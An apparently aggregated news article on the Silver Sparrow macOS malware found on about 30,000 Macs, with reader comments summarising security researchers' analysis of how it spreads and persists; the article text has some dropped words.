Over 30,000 Apple Macs have been infected with a high-stealth malware, and the company has no idea why

Authored by businessinsider.in and submitted by bartturner

San Francisco,have discovered aon nearly 30,000Macs and they have nowhat this is for and how is this virus going to infected the devices.The malware named 'Silver Sparrow' comes with a mechanism to self-destruct itself, a capability that's typically reserved for high-stealth operations."So far, though, there are no signs the self-destruct feature has been used, raising the question of why the mechanism exists," Ars Technica first reported about the presence of malware citing security researchers.The lack of a final payload suggests that the malware may spring into action anytime.The malware has been found in 153 countries with heavy detection reported in the US, the UK, Canada, France andSilver Sparrow is an activity cluster that includes a binary compiled to run on Apple's new M1 chips but lacks one very important feature: a payload."Though we haven't observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat," according to researchers from cyber security firm Red Canary.The malware is uniquely positioned to deliver a potentially impactful payload at a moment's notice.Silver Sparrow comes in two versions — one with a binary in mach-object format compiled forx86_64 processors and the other Mach-O binary for the M1.Researchers have earlier warned that Apple's transition from Intel to its own silicon M1 chip may make it easy for hackers to introduce malware."To me, the most notable [thing] is that it was found on almost 30K macOS endpoints... and these are only endpoints thecan see, so the number is likely way higher," said Patrick Wardle, a macOS security expert.

IAMA-Dragon-AMA on February 22nd, 2021 at 19:10 UTC »

To give more information because this article is very lacking. From an analysis done by Red Canary the trojan appears to the user as update.pkg or updater.pkg and masquerades as a software update using malicious advertisements. The ad might say something like, "Cannot display this content as your version of xyz is out of date, click here to update." and then the user unwittingly downloads the malware onto their machine.

The reason it's considered "high stealth" is mainly because it doesn't include its final payload and contains the means to delete itself. If the malware detects a file called ~/Library/._insu it uninstalls itself automatically. This could have been a way for the attacker to prevent their own systems from being infected while testing or it could be something core to the function of the malware which attempts to avoid infecting machines after it's already run its course. Either way the fact that even analyzing it there's no way to know what is end goal is combined with its ability to delete itself has lead malware researchers to conclude it's attempting to conceal its actual malicious package. Hence the "high stealth" title. In terms of what it's doing on an actual machine it's anything but stealthy and really uses a lot of well known malware techniques such as creating a launchagent which will reliably start its process when the machine boots.

When on a machine it downloads a file from an AWS hosted server every hour and then runs arbitrary shell code based on the contents. That means whatever commands the attackers put onto the server all the infected machines will download and execute. The idea is that at some point in the future the malware will get a command telling it to download the actual payload and then execute it. For now though it's just waiting and until the malware is activated and told to download the payload there's no way of knowing what it's actual goal is. The reason this is considered somewhat noteworthy is because an updated version of it has been adapted for the M1 ARM64 architecture which is still very young. Making it one of very very few pieces of malware which has actually been configured to run in that environment. The fact that the attackers saw fit to update support for the new architecture combined with the distributed cloud approach to command and control and a few other novel features has been enough to suggest they might be somewhat knowledgeable and so the threat should be taken seriously.

There's really not much more to this than any other malware for MacOS and most articles are just capitalizing on the phrase "High stealth" as well as the mystery about what the final package will be for clicks and then give no other information. The company "Has no idea why" the malware is infecting people in the same way you "Have no idea why" someone might be knocking on your front door with a gun. Sure you don't know exactly what they're doing there but it's not anything great and you could probably come up with a few good guesses that wouldn't be too far off the mark.

iGadget on February 22nd, 2021 at 16:37 UTC »

Article: "There is a widespread of malware on Macs."

Mac user: "So any further infos would be nice... eg.: How to find it?"

Article: ––– 😶

Holanz on February 22nd, 2021 at 14:40 UTC »

Ok so how do we fix this?